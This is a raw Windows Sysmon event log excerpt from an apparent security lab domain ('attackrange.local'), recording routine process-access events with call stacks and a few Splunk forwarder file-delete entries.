08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.839{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001053948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F7973FB19704ECBE215870B4F73AAFE,SHA256=2A5BE4FBFD1E3AE2E076248AFD9FC45D4BA10EBBD374A2DC52B7EA921891C066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:46.933{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C14F59D3C6089283D387191B01CDE43,SHA256=24FFC8AABB407E144A1551E88C19C766AA46E64FF1125D9EB6AA73E6DFA0727B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.991{466BC892-02B0-60E8-1600-00000000CF01}13048524C:\Windows\System32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.991{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.976{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.960{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.960{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 